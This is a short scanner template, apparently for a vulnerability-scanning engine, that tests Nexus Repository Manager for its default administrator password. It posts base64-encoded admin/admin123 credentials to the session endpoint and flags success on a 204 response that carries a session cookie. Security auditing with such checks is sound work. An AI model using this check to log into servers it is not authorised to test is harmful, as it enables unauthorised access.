id: nexus-default-password

info:
    name: Nexus Default Password
    author: Soveless(https://github.com/Soveless)
    severity: high
    verified: true
    description: body="Nexus Repository Manager"

rules:
    r0:
        request:
            method: POST
            path: /service/rapture/session
            headers:
                X-Nexus-UI: true
            body: username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
        expression: response.status == 204 && response.raw_header.bcontains(b'NXSESSIONID')
expression: r0()

